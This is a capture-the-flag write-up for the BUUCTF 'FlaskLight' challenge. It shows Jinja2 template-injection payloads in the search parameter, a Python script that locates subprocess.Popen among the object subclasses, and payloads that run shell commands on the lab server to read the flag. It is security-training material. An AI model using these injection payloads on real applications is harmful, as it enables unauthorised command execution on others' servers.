BUUCTF:[CSCCTF 2019 Qual]FlaskLight
题目地址:https://buuoj.cn/challenges#[CSCCTF%202019%20Qual]FlaskLight
![BUUCTF:[CSCCTF 2019 Qual]FlaskLight_第1张图片](http://img.e-com-net.com/image/info8/5dc29ccd456e4e7196a466525d4b0ae4.jpg)
![BUUCTF:[CSCCTF 2019 Qual]FlaskLight_第2张图片](http://img.e-com-net.com/image/info8/cbe9ea7f406a449bb8e84a35cb856296.jpg)
?search={{7*7}}
#通过回显判断SSTI
![BUUCTF:[CSCCTF 2019 Qual]FlaskLight_第3张图片](http://img.e-com-net.com/image/info8/1ca5bb56ea1e4e52a0f353c62a9a92d8.jpg)
?search={{''.__class__.__mro__[2].__subclasses__()}}
#爆出所有类
编写脚本查找可利用的类
利用subprocess.Popen执行命令
import requests
import re
import html
import time
index = 0
for i in range(170, 1000):
try:
url = "http://17ad255a-204e-4624-b878-e3e0d62e526a.node3.buuoj.cn/?search={{''.__class__.__mro__[2].__subclasses__()[" + str(i) + "]}}"
r = requests.get(url)
res = re.findall("You searched for:<\/h2>\W+(.*)<\/h3>"
, r.text)
time.sleep(0.1)
# print(res)
# print(r.text)
res = html.unescape(res[0])
print(str(i) + " | " + res)
if "subprocess.Popen" in res:
index = i
break
except:
continue
print("indexo of subprocess.Popen:" + str(index))
?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}
?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls /flasklight',shell=True,stdout=-1).communicate()[0].strip()}}
?search={{''.__class__.__mro__[2].__subclasses__()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}
![BUUCTF:[CSCCTF 2019 Qual]FlaskLight_第4张图片](http://img.e-com-net.com/image/info8/43508588c7fb452889dde09cb6f7579d.jpg)
原文作者:D15h35
链接:https://yanmymickey.github.io/2020/04/15/CTFwp/%5BCSCCTF%202019%20Qual%5DFlaskLight/